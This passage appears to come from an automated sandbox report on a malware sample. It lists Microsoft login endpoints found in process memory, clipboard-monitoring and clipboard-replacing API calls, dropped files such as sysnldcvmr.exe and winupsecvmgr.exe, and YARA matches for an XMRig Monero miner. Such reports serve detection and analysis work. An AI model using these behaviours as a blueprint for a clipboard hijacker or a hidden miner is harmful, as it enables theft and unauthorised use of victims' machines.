                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80601
                          Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                          Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                          Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                          Source: svchost.exe, 00000011.00000003.1925775502.000001A6A3AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                          Source: svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                          Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                          Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                          Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                          Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                          Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                          Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                          Source: svchost.exe, 00000011.00000003.1954487406.000001A6A435A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DmhFZ
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                          Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                          Source: svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                          Source: svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749005384.000001A6A4357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&amp;fid=cp
                          Source: svchost.exe, 00000011.00000003.1748676169.000001A6A435A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                          Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                          Source: svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srfom
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                          Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com1
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                          Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                          Source: svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_00405970 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,4_2_00405970
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_00404970
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00404970
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_00404970
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_00405970 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,4_2_00405970
                          Source: 2779421088.exe, 00000009.00000003.1605258537.00000000035A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_744460ad-9
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_00405970 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,4_2_00405970
                          Source: Yara matchFile source: 9.3.2779421088.exe.35a0000.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 9.3.2779421088.exe.3380000.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.3.svchost.exe.50e0000.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.3.svchost.exe.50e0000.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.3.svchost.exe.4ec0000.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000003.1608329177.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000003.1608484945.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.1605258537.00000000035A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.1605094211.0000000003380000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 2779421088.exe PID: 8088, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8108, type: MEMORYSTR

                          Spam, unwanted Advertisements and Ransom Demands

                          barindex
                          Source: Yara matchFile source: Process Memory Space: 896429707.exe PID: 7668, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sysnldcvmr.exe PID: 7744, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sysnldcvmr.exe PID: 8000, type: MEMORYSTR

                          System Summary

                          barindex
                          Source: 29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 29.2.winupsecvmgr.exe.7ff731d0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 29.2.winupsecvmgr.exe.7ff731d10320.2.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 47.2.winupsecvmgr.exe.7ff7a1f30320.1.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 0000002F.00000002.3552448433.00007FF7A1F0B000.00000004.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 0000001D.00000002.2779057358.00007FF731CEB000.00000004.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_0040D4A0 NtQuerySystemTime,RtlTimeToSecondsSince1980,4_2_0040D4A0
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_0040F0B1 NtQueryVirtualMemory,4_2_0040F0B1
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_0040D4A0 NtQuerySystemTime,RtlTimeToSecondsSince1980,5_2_0040D4A0
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_0040F0B1 NtQueryVirtualMemory,5_2_0040F0B1
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040D4A0 NtQuerySystemTime,RtlTimeToSecondsSince1980,7_2_0040D4A0
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040F0B1 NtQueryVirtualMemory,7_2_0040F0B1
                          Source: C:\Windows\System32\fontdrvhost.exeCode function: 12_2_00000270F6671AA4 NtAcceptConnectPort,NtAcceptConnectPort,12_2_00000270F6671AA4
                          Source: C:\Windows\System32\fontdrvhost.exeCode function: 12_2_00000270F6671CF4 NtAcceptConnectPort,CloseHandle,12_2_00000270F6671CF4
                          Source: C:\Windows\System32\fontdrvhost.exeCode function: 12_2_00000270F66715C0 NtAcceptConnectPort,12_2_00000270F66715C0
                          Source: C:\Windows\System32\fontdrvhost.exeCode function: 12_2_00000270F6670AC8 NtAcceptConnectPort,NtAcceptConnectPort,12_2_00000270F6670AC8
                          Source: C:\Windows\System32\conhost.exeCode function: 32_2_00007FF6CE1F3F40 NtClose,32_2_00007FF6CE1F3F40
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeFile created: C:\Windows\sysnldcvmr.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_0040EE744_2_0040EE74
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_004040904_2_00404090
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_00407B494_2_00407B49
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_004049704_2_00404970
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_0040A5004_2_0040A500
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_00407B204_2_00407B20
